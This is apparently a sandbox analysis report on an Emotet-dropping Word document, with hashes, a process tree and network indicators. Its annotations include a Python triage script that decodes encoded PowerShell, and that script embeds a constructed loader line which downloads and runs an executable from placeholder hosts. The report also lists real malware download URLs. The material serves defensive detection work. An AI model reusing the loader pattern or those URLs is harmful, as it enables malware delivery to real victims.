File name: | za1.doc |
Full analysis: | https://app.any.run/tasks/f3bae1f7-6afe-4d3b-8f3d-005bbf3be28a |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded into a highly destructive piece of malware. It targets mostly corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | May 20, 2019, 12:43:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: South Carolina Factors proactive, Subject: heuristic, Author: Summer Considine, Comments: Small interface, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 16 07:40:00 2019, Last Saved Time/Date: Thu May 16 07:40:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 169, Security: 0 |
MD5: | 1FDA265953F1A6B8D11AC8F17437FF13 |
SHA1: | D1301EAAFABE82A8F635B1423675C9450FCC67C3 |
SHA256: | AEFB5DEA65BFCC5D6691ECB2C8F263FA274B7FEA8944C660BA0F7FA8B59A7642 |
SSDEEP: | 3072:U77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q5v00onxZp1D1sluc7Ku:U77HUUUUUUUUUUUUUUUUUUUT52VOs0o+ |
Extension | Description | Match (%)
---|---|---
.doc | Microsoft Word document | 54.2
.doc | Microsoft Word document (old ver.) | 32.2
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
Title: | South Carolina Factors proactive |
Subject: | heuristic |
Author: | Summer Considine |
Keywords: | - |
Comments: | Small interface |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:05:16 06:40:00 |
ModifyDate: | 2019:05:16 06:40:00 |
Pages: | 1 |
Words: | 29 |
Characters: | 169 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Sipes and Sons |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 197 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | - |
Manager: | Kemmer |
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
2480 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\za1.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
User: admin, Company: Microsoft Corporation, Integrity Level: MEDIUM, Description: Microsoft Word, Version: 14.0.6024.1000
3176 | PowErsHell -enC <encoded command not reproduced here> | C:\Windows\System32\WindowsPowerShell\v1.0\PowErsHell.exe | — | wmiprvse.exe
User: admin, Company: Microsoft Corporation, Integrity Level: MEDIUM, Description: Windows PowerShell, Exit code: 0, Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Two details of this tree matter for detection. PowerShell's parent is wmiprvse.exe, not WINWORD.EXE: the macro starts it through WMI, so the WMI provider host creates the process and a rule that keys only on "Office spawns PowerShell" will not fire; the document has to be tied to the PowerShell process through the WMI activity or the timeline instead. The process is also launched with mixed casing in the image name (PowErsHell) and a base64 -enC argument, both of which defeat case-sensitive string matching on the command line; match on the resolved image path and decode the argument rather than searching for "powershell -EncodedCommand".
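To make the encoded-command and WMI-parent points concrete, here is an added triage script for rows in the shape of the process table above. It is my example, not ANY.RUN's tooling and not code from the sample. The report does not reproduce the -enC payload, so the script constructs a stand-in in the shape Emotet's 2019 loaders used (an '@'-joined URL list downloaded into the user profile); the hosts in it are .invalid placeholders, the WINWORD row is copied from the table, and the PowerShell row keeps the table's casing and parent but carries the constructed payload.

```python
import base64
import re

# Constructed stand-in for the -enC payload the report redacts: a loader in the
# shape Emotet's 2019 macros used ('@'-joined URL list, download into the user
# profile, run the first that succeeds). Hosts are .invalid placeholders.
SAMPLE_SCRIPT = (
    "$u='http://host-a.invalid/wp/a1/@http://host-b.invalid/itau/b2/"
    "@http://host-c.invalid/wp/c3/'.Split('@');"
    "$o=$env:userprofile+'\\165.exe';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$o);"
    "Invoke-Item $o;break}catch{}}"
)


def encode_command(script: str) -> str:
    """Encode as powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Process rows in the shape of the report's table. The WINWORD row is copied
# from it; the PowerShell row keeps its odd casing and WMI parent but carries
# the constructed payload above instead of the redacted one.
SAMPLE_PROCESSES = [
    {"pid": 2480,
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
                r'"C:\Users\admin\AppData\Local\Temp\za1.doc"',
     "parent": "explorer.exe"},
    {"pid": 3176,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\PowErsHell.exe",
     "cmdline": "PowErsHell -enC " + encode_command(SAMPLE_SCRIPT),
     "parent": "wmiprvse.exe"},
]

# powershell.exe takes any unambiguous prefix of -EncodedCommand (-e, -en,
# -enc, ...) plus the -ec alias, case-insensitively, so match all of them.
_ENC_NAMES = ["ec"] + ["encodedcommand"[:n] for n in range(14, 0, -1)]
_ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)[-/](?:" + "|".join(_ENC_NAMES) + r")\s+([A-Za-z0-9+/=]+)")
# '@' is excluded from URL characters because these loaders join URLs with it.
_URL = re.compile(r"https?://[^\s'\"@;]+")


def decode_encoded_command(cmdline: str):
    """Decoded script if the command line carries an encoded command, else None."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_urls(script: str):
    """Download candidates from a decoded loader, in the order it tries them."""
    return _URL.findall(script)


def triage_process(proc: dict):
    """Indicators a responder would raise on one row of the process table."""
    findings = []
    image = proc["image"].rsplit("\\", 1)[-1]
    if image.lower() != "powershell.exe":
        return findings
    if proc["parent"].lower() == "wmiprvse.exe":
        findings.append("parent is wmiprvse.exe: launched via WMI, so the Office "
                        "process never appears as the parent")
    if image not in ("powershell.exe", "PowerShell.exe"):
        findings.append(f"image name {image!r} is cased unlike the on-disk binary "
                        "(defeats case-sensitive string matching)")
    script = decode_encoded_command(proc["cmdline"])
    if script is not None:
        urls = extract_urls(script)
        findings.append(f"encoded command decoded; {len(urls)} download URL(s): {urls}")
    return findings


def triage_report(procs):
    """Map each PID to its findings; an empty list means nothing was flagged."""
    return {p["pid"]: triage_process(p) for p in procs}


if __name__ == "__main__":
    for pid, found in triage_report(SAMPLE_PROCESSES).items():
        print(pid, found or "no indicators")
```

Run it stand-alone to see the WINWORD row pass clean and the PowerShell row produce three findings: the WMI parent, the odd casing, and the decoded URL list. Against a real report, replace SAMPLE_PROCESSES with rows from the process table and the decoder will recover the loader's URL list without any hard-coded knowledge of the sample.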
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3F9C.tmp.cvr | — | — | —
3176 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NXQKKOHFQVVISVZFJFFT.temp | — | — | —
3176 | PowErsHell.exe | C:\Users\admin\165.exe | — | — | —
2480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$za1.doc | pgc | 9C2C9AFCBE27A29BB04008A2DB6029EB | 7A48F2E799A792965B4796A176C938711F0F4451CEB7C2C35FB0DDD822DBF795
2480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8D18E4D0.wmf | wmf | 7B2FCB15B8B0FA1CB42261940D9179A2 | E6EA9D892F10BCEF0C1A34089ECEB285D73D3621ECDCBA8C73517C4F98EF9ED2
2480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D34AC544.wmf | wmf | DEBC834E679FA8C09C59BA1D55A2D921 | 062E34C3D3F5525DB5BFBC64369D3BF999179D900AEAC44BCF5C6D418D877B6C
2480 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 3107227F47377D26DFEB4773A6AFB83A | 4EE8125788061B77C12B0342B95E5F66F95A1F848A3B39220512773F24BA77B3
3176 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
2480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9E3A0FF2.wmf | wmf | C0A5C41231FA91F0AB6CD87F4D06258F | 62D40E3EC31B73C9CFC2E429C61ECE1A55B4F02610F41D10C9C46FD87EBE10BE
2480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D543335E.wmf | wmf | 022A9D466F666D42CECEE0ABE775B697 | C919C0D968460BF2684ABEF039EF174851EC340DEA063EEC3343430D24DEB0C7

The one file that matters is C:\Users\admin\165.exe, an executable written by PowerShell straight into the user profile root; the sandbox recorded no hash for it, so it cannot be matched from this report alone. The .wmf and ~$ entries are ordinary Word rendering and owner-lock artifacts, and the CustomDestinations entries are jump-list records created when the PowerShell host starts.
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
---|---|---|---|---|---|---|---|---|---
3176 | PowErsHell.exe | GET | 403 | 134.0.8.99:80 | http://jubilengua.com/wp/pcpef331/ | ES | html | 214 B | suspicious
3176 | PowErsHell.exe | GET | 403 | 31.47.74.167:80 | http://domoticavic.com/itau/u5a41/ | ES | html | 72.1 KB | suspicious
3176 | PowErsHell.exe | GET | 200 | 216.194.166.182:80 | http://businessfixnow.com/wp/3og7m3361/ | US | html | 27.2 KB | unknown

The first two hosts answered 403 and only the third returned 200, after which PowerShell wrote C:\Users\admin\165.exe: the behaviour of a loader walking its URL list until one download succeeds. The URLs sit under ordinary WordPress paths (/wp/) on unrelated sites, so block by full URL or path pattern rather than by domain, and expect the list to differ between samples.
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3176 | PowErsHell.exe | 37.139.14.80:443 | annilopponen.com | Digital Ocean, Inc. | NL | unknown |
3176 | PowErsHell.exe | 134.0.8.99:80 | jubilengua.com | 10dencehispahard, S.L. | ES | suspicious |
3176 | PowErsHell.exe | 216.194.166.182:80 | businessfixnow.com | InMotion Hosting, Inc. | US | unknown |
3176 | PowErsHell.exe | 31.47.74.167:80 | domoticavic.com | Tecnocratica Centro de Datos, S.L. | ES | suspicious |
Domain | IP | Reputation
---|---|---
annilopponen.com | 37.139.14.80 | suspicious
dns.msftncsi.com | — | shared
wordpress-269961-838458.cloudwaysapps.com | — | unknown
jubilengua.com | 134.0.8.99 | suspicious
businessfixnow.com | 216.194.166.182 | unknown
domoticavic.com | 31.47.74.167 | suspicious

IPs are filled in from the connections table above where the host was actually contacted. dns.msftncsi.com is the Windows Network Connectivity Status Indicator probe and is background noise rather than sample activity; wordpress-269961-838458.cloudwaysapps.com was resolved but no connection to it is recorded.